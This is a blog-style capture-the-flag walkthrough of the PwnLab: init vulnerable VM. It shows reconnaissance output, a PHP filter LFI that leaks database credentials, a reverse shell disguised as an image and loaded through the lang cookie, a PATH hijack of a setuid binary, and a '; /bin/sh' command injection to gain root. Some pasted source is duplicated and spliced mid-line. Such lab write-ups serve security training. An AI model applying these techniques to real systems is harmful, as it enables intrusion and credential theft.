Pwn Init Walkthrough:
I have tried b00ting up Fristileaks and Stapler, but have failed to do so on VMWare Workstation and Virtualbox. If anyone knows how, let me know.
Let's follow up with nmap to enumerate the host.
nmap -A -sV -p- 192.168.1.69
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 22:30 EDT Nmap scan report for 192.168.1.69 Host is up (0.00065s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: PwnLab Intranet Image Hosting 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 35631/tcp status |_ 100024 1 52870/udp status 3306/tcp open mysql MySQL 5.5.47-0+deb8u1 | mysql-info: | Protocol: 10 | Version: 5.5.47-0+deb8u1 | Thread ID: 40 | Capabilities flags: 63487 | Some Capabilities: SupportsLoadDataLocal, SupportsCompression, IgnoreSpaceBeforeParenthesis, Support41Auth, LongColumnFlag, LongPassword, Speaks41ProtocolNew, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, FoundRows, IgnoreSigpipes, DontAllowDatabaseTableColumn, ODBCClient, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: cZwi(+>8;]G+>8<deP=! |_ Auth Plugin Name: 88 35631/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:D8:B9:5C (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.65 ms 192.168.1.69 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.71 seconds
We can see there are open ports, which are 80, 111, 3306. amd 35631.
I have tried SQL injection bypass methods, and they don't seem to work at the moment.
Let's try a nikto for the webserver and see what we can find.
root@kali:~/Downloads/exploits# nikto -h 192.168.1.69
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.69 + Target Hostname: 192.168.1.69 + Target Port: 80 + Start Time: 2019-07-13 22:39:49 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + IP address found in the 'location' header. The IP is "127.0.1.1". + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1". + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Cookie PHPSESSID created without the httponly flag + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /config.php: PHP Config file may contain database IDs and passwords. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found.Let's see if we can check out the /config.php file to see if there are sensitive information there.
To no avail did the config.php file bear anything interesting.
There must be some sort of LFI vulnerability with a php filter. More information could be found here.
Following the example, we can try to put the .php filter into the LFI, such as:
http://target_ip/?page=php://filter/convert.base64-encode/resource=configIf we look back at the base64 encoding, we can see that it has yielded config.php to a base-64 encode.
Now, we can decode it.
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+
When we decode it, we get:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
Snap! That's a good sign.
If we are lucky, we can do a remote access to mySQL in port 3306.
root@kali:~/Downloads/exploits# mysql --user=root --password --host=192.168.1.69
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.00 sec)
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
MySQL [Users]> select * from users
-> ;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.01 sec)
MySQL [Users]>
user: kent password: JWzXuBJJNy
user: mike password: SIfdsTEn6I
user: kane password: iSv5Ym2GRo
These three users give us login access to each their user.
After logging in as mike, we see that there is an uploader that allows us to upload arbitrary shells. Now, we to do more recon. on:
http://target_ip/?page=php://filter/convert.base64-encode/resource=upload After decoding the base-64 string that comes with it, we get the inner functionality of the page's source as follows:
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} el<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}
?>se {
die('Error 4');
}
}
}
?>
By looking at the code, the uploader seems to only take .jpg, .jpeg, .gif, and .png.
Let's see if we can tuck a shell in here.
Getting hold of a PHP shell isn't too hard. Just copy it from Kali Linux.
$ cp /usr/share/webshells/php/php-reverse-shell.php .$ mv php-reverse-shell.php shell.gif Looking back at index.php, we can see that there seems to be cookie manipulation to inject "lang" cookies in there.
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html> Let's try to get a shell by injecting our .png file into the lang cookie using BurpSuite Community edition.iSv5Ym2GRo
Now, reference the cookie of lang when you are done like this.
If we observe the left side for Burpsuite, we can see get a listener by referencing in the cookie that lang=../upload/f3035846cc279a1aff73b7c2c25367b9.gif (the path of your picture).
Thus, we have popped a reverse shell by that. And, we are in.
Let us meanwhile upgrade to a python pty shell.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@pwnlab:/$
Now, we can su to different users and check out their directories.
I have tried su (switching users) into different users for kent and mike.
www-data@pwnlab:/$ su kent
su kentPassword: JWzXuBJJNy
kent@pwnlab:/$ ls
ls
bin dev home lib media opt root sbin sys usr vmlinuz
boot etc initrd.img lost+found mnt proc run srv tmp var
kent@pwnlab:/$ cd ~
cd ~
kent@pwnlab:~$ ls
ls
kent@pwnlab:~$
There were no good results.
The user mike didn't work when I tried to login. Now, I am trying the user, kane.
I will now login with kane using the
username: kane
password: iSv5Ym2GRo
Once I am in kane's home directory, I see that there is a path that we can subvert.
When I do a ./msgmike, I see that t<iframe src="https://giphy.com/embed/3oKIPcqmx1mpCOJJp6" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe><p><a href="https://giphy.com/gifs/debbyryan-debby-ryan-3oKIPcqmx1mpCOJJp6">via GIPHY</a></p>here is something wrong with the cat executable. It has a linked path to that.
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat
kane@pwnlab:~$ ls -lash msgmike
ls -lash msgmike
8.0K -rwsr-sr-x 1 mike mike 5.1K Mar 17 13:04 msgmike
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ ls -lasht cat
ls -lasht cat
4.0K -rwxrwxrwx 1 kane kane 10 Aug 12 02:52 cat
kane@pwnlab:~$ export PATH=.:$PATH
export PATH=.:$PATH
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ whoami
whoami
mike
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls
ls
msg2root
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: ; /bin/sh
Here, there is a command execution that can be done to get root.
; /bin/sh
# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# whoami
whoami
root
Once we obtain root, we can finally get the flag.txt.
Alternatively, we can get r00t through the dirtycow.py exploit (a privilege escalation exploit made for vulnerable Linux kernels).
Once we do a cat /root/flag.txt, we can get this message. Hope you enjoyed reading my detailed writeup.
via GIPHY
No comments:
Post a Comment